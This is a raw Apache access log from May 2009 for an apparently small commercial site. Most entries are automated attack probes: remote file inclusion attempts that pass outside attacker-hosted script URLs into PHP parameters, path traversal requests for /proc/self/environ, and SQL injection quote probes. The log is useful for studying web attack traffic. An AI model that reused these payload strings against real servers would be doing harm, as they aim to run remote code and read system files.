65.23.154.225 - - [20/May/2009:00:43:10 -0400] "GET /logs/access_log.Q108090200/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.23.154.225 - - [20/May/2009:00:43:10 -0400] "GET /logs/access_log.Q108090200/components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 261 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:43:10 -0400] "GET /logs/access_log.Q108090200/components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 261 "-" "XXXXXX"
171.64.75.45 - - [20/May/2009:00:43:12 -0400] "GET /logs/error_log.Q108122800/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
171.64.75.45 - - [20/May/2009:00:43:17 -0400] "GET /logs/error_log.Q108122800/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
208.77.97.179 - - [20/May/2009:00:43:18 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
208.77.97.179 - - [20/May/2009:00:43:18 -0400] "GET /logs/access_log.Q108090400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
208.77.97.179 - - [20/May/2009:00:43:18 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
69.248.128.84 - - [20/May/2009:00:43:22 -0400] "GET /logs/error_log.Q109050600/errors.php?error=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
69.248.128.84 - - [20/May/2009:00:43:26 -0400] "GET /errors.php?error=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
69.248.128.84 - - [20/May/2009:00:43:28 -0400] "GET /logs/errors.php?error=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
208.77.97.179 - - [20/May/2009:00:44:03 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
208.77.97.179 - - [20/May/2009:00:44:03 -0400] "GET /logs/access_log.Q108090400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
208.77.97.179 - - [20/May/2009:00:44:03 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
195.229.237.38 - - [20/May/2009:00:44:55 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
195.229.237.38 - - [20/May/2009:00:44:55 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
195.229.237.38 - - [20/May/2009:00:44:57 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
195.229.237.38 - - [20/May/2009:00:44:57 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
82.110.102.244 - - [20/May/2009:00:44:58 -0400] "GET /administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.813"
82.110.102.244 - - [20/May/2009:00:44:58 -0400] "GET /logs/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.813"
82.110.102.244 - - [20/May/2009:00:44:58 -0400] "GET /logs/access_log.Q109011400/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.813"
82.110.102.244 - - [20/May/2009:00:44:59 -0400] "GET /logs/access_log.Q108120600/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.813"
218.1.64.133 - - [20/May/2009:00:45:07 -0400] "GET /logs/access_log.Q108090100//phplinks/includes/smarty.php?full_path_to_public_program=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 254 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
218.1.64.133 - - [20/May/2009:00:45:08 -0400] "GET /logs/access_log.Q108090100/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
218.1.64.133 - - [20/May/2009:00:45:08 -0400] "GET /logs/access_log.Q108090100//phplinks/includes/smarty.php?full_path_to_public_program=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 254 "-" "XXXXXX"
91.184.52.10 - - [20/May/2009:00:45:09 -0400] "GET /logs/access_log.Q108073000//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.1.64.133 - - [20/May/2009:00:45:09 -0400] "GET /logs/access_log.Q108090100//phplinks/includes/smarty.php?full_path_to_public_program=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 254 "-" "XXXXXX"
209.59.12.99 - - [20/May/2009:00:46:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.142.171 - - [20/May/2009:00:46:22 -0400] "GET /logs/access_log.Q108052500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.143.98.5 - - [20/May/2009:00:46:25 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:00:46:25 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
82.110.102.244 - - [20/May/2009:00:46:37 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.813"
82.110.102.244 - - [20/May/2009:00:46:37 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.813"
82.110.102.244 - - [20/May/2009:00:46:37 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.813"
210.240.12.4 - - [20/May/2009:00:46:42 -0400] "GET /logs/access_log.Q108090400//skin/zero_vote/ask_password.php?dir=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
65.23.154.225 - - [20/May/2009:00:47:01 -0400] "GET /logs/access_log.Q108052400/title.php?id==' HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
65.23.154.225 - - [20/May/2009:00:47:01 -0400] "GET /title.php?id==' HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
65.23.154.225 - - [20/May/2009:00:47:01 -0400] "GET /logs/title.php?id==' HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
217.199.222.19 - - [20/May/2009:00:47:24 -0400] "GET /logs/access_log.Q109050700//skin/zero_vote/login.php?dir=http://cameraexchange.com.au/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.199.222.19 - - [20/May/2009:00:47:24 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://cameraexchange.com.au/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.199.222.19 - - [20/May/2009:00:47:25 -0400] "GET //skin/zero_vote/login.php?dir=http://cameraexchange.com.au/id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
208.77.97.179 - - [20/May/2009:00:49:07 -0400] "GET /logs/access_log.Q108090400%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
217.199.222.19 - - [20/May/2009:00:49:28 -0400] "GET /logs/access_log.Q109050300//skin/zero_vote/login.php?dir=http://cameraexchange.com.au/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.248.128.84 - - [20/May/2009:00:49:39 -0400] "GET /?sourcedir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
116.50.189.241 - - [20/May/2009:00:49:57 -0400] "GET /logs/access_log.Q109011400 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
208.77.97.179 - - [20/May/2009:00:50:06 -0400] "GET /logs/access_log.Q108090400%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
82.110.102.244 - - [20/May/2009:00:50:10 -0400] "GET /logs/access_log.Q108060200%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.813"
66.249.72.114 - - [20/May/2009:00:50:44 -0400] "GET /images/over-index19_bldpressmo.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
208.77.97.179 - - [20/May/2009:00:50:52 -0400] "GET /logs/access_log.Q108081800%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [20/May/2009:00:51:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.248.128.84 - - [20/May/2009:00:51:28 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
208.77.97.179 - - [20/May/2009:00:51:39 -0400] "GET /logs/access_log.Q108081800%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
89.211.95.126 - - [20/May/2009:00:51:59 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; GTB6)"
89.211.95.126 - - [20/May/2009:00:51:59 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; GTB6)"
89.211.95.126 - - [20/May/2009:00:52:01 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; GTB6)"
89.211.95.126 - - [20/May/2009:00:52:01 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; GTB6)"
212.150.52.114 - - [20/May/2009:00:52:02 -0400] "GET //main.php?sayfa=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
212.150.52.114 - - [20/May/2009:00:52:02 -0400] "GET /logs//main.php?sayfa=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
212.150.52.114 - - [20/May/2009:00:52:02 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
212.150.52.114 - - [20/May/2009:00:52:03 -0400] "GET //main.php?sayfa=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
212.150.52.114 - - [20/May/2009:00:52:03 -0400] "GET /logs//main.php?sayfa=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
212.150.52.114 - - [20/May/2009:00:52:03 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
212.150.52.114 - - [20/May/2009:00:52:07 -0400] "GET /logs/access_log.Q108122200%20%20//main.php?sayfa=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
212.150.52.114 - - [20/May/2009:00:52:07 -0400] "GET /logs/access_log.Q108122200%20%20//main.php?sayfa=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
221.139.104.104 - - [20/May/2009:00:52:42 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
209.175.180.194 - - [20/May/2009:00:52:58 -0400] "GET //skin/zero_vote/error.php?dir=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
209.175.180.194 - - [20/May/2009:00:52:58 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.175.180.194 - - [20/May/2009:00:52:58 -0400] "GET /logs/access_log.Q109050700%20%20//skin/zero_vote/error.php?dir=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
221.139.104.104 - - [20/May/2009:00:53:04 -0400] "GET /logs/access_log.Q108111700///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
221.139.104.104 - - [20/May/2009:00:53:05 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 2094 "-" "libwww-perl/5.805"
69.248.128.84 - - [20/May/2009:00:53:44 -0400] "GET /logs/access_log.Q108121100//?path%5Bdocroot%5D=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
209.175.180.194 - - [20/May/2009:00:54:12 -0400] "GET //skin/zero_vote/login.php?dir=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
209.175.180.194 - - [20/May/2009:00:54:12 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.175.180.194 - - [20/May/2009:00:54:12 -0400] "GET /logs/access_log.Q109050700%20%20//skin/zero_vote/login.php?dir=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
212.150.52.114 - - [20/May/2009:00:54:12 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
212.150.52.114 - - [20/May/2009:00:54:12 -0400] "GET /logs/access_log.Q108122200//main.php?sayfa=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
212.150.52.114 - - [20/May/2009:00:54:14 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
212.150.52.114 - - [20/May/2009:00:54:14 -0400] "GET /logs/access_log.Q108122200//main.php?sayfa=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
212.150.52.114 - - [20/May/2009:00:54:46 -0400] "GET /logs/access_log.Q109022600//main.php?sayfa=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
221.139.104.104 - - [20/May/2009:00:54:48 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
209.200.8.89 - - [20/May/2009:00:55:07 -0400] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
62.141.54.240 - - [20/May/2009:00:55:08 -0400] "GET /logs/access_log.Q108102400//appserv/main.php?appserv_root=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:55:09 -0400] "GET /logs/access_log.Q109010200//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
221.139.104.104 - - [20/May/2009:00:55:10 -0400] "GET /logs/access_log.Q109020600///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
65.23.154.225 - - [20/May/2009:00:55:10 -0400] "GET /logs/access_log.Q108052400/post.php?action=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 233 "-" "Mozilla/4.61 [en] (OS/2; U)"
65.23.154.225 - - [20/May/2009:00:55:10 -0400] "GET /logs/post.php?action=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 211 "-" "Mozilla/4.61 [en] (OS/2; U)"
65.23.154.225 - - [20/May/2009:00:55:10 -0400] "GET /post.php?action=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 206 "-" "Mozilla/4.61 [en] (OS/2; U)"
65.23.154.225 - - [20/May/2009:00:55:10 -0400] "GET /logs/access_log.Q108052400/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
65.23.154.225 - - [20/May/2009:00:55:10 -0400] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
65.23.154.225 - - [20/May/2009:00:55:10 -0400] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
65.23.154.225 - - [20/May/2009:00:55:10 -0400] "GET /logs/access_log.Q108052400/post.php?action=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 233 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:55:11 -0400] "GET /logs/post.php?action=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 211 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:55:11 -0400] "GET /post.php?action=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 206 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:55:11 -0400] "GET /logs/access_log.Q108052400/post.php?action=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:55:11 -0400] "GET /logs/post.php?action=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 211 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:55:11 -0400] "GET /post.php?action=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 206 "-" "XXXXXX"
209.200.8.89 - - [20/May/2009:00:55:11 -0400] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:55:12 -0400] "GET /logs/access_log.Q109010200//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:55:13 -0400] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:55:13 -0400] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
62.141.54.240 - - [20/May/2009:00:55:19 -0400] "GET /logs/access_log.Q108102400//appserv/main.php?appserv_root=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.175.180.194 - - [20/May/2009:00:55:23 -0400] "GET //skin/zero_vote/login.php?dir=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
209.175.180.194 - - [20/May/2009:00:55:23 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.175.180.194 - - [20/May/2009:00:55:23 -0400] "GET /logs/access_log.Q109050700%20%20//skin/zero_vote/login.php?dir=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.241.40.51 - - [20/May/2009:00:55:28 -0400] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.241.40.51 - - [20/May/2009:00:55:31 -0400] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
212.150.52.114 - - [20/May/2009:00:55:36 -0400] "GET /logs/access_log.Q109022600//main.php?sayfa=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
68.5.151.194 - - [20/May/2009:00:55:36 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0064BA4B3001C600E21D02E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
209.175.180.194 - - [20/May/2009:00:55:43 -0400] "GET //skin/zero_vote/error.php?dir=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
209.175.180.194 - - [20/May/2009:00:55:43 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.175.180.194 - - [20/May/2009:00:55:43 -0400] "GET /logs/access_log.Q109050700//skin/zero_vote/error.php?dir=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
68.5.151.194 - - [20/May/2009:00:55:44 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
69.248.128.84 - - [20/May/2009:00:55:57 -0400] "GET /phphtml.php?htmlclass_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
211.241.40.51 - - [20/May/2009:00:56:03 -0400] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.241.40.51 - - [20/May/2009:00:56:03 -0400] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
69.248.128.84 - - [20/May/2009:00:56:06 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
69.248.128.84 - - [20/May/2009:00:56:07 -0400] "GET ///vwar/backup/errors.php?error=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
69.248.128.84 - - [20/May/2009:00:56:07 -0400] "GET /logs///vwar/backup/errors.php?error=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
209.59.12.99 - - [20/May/2009:00:56:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.200.8.89 - - [20/May/2009:00:56:26 -0400] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
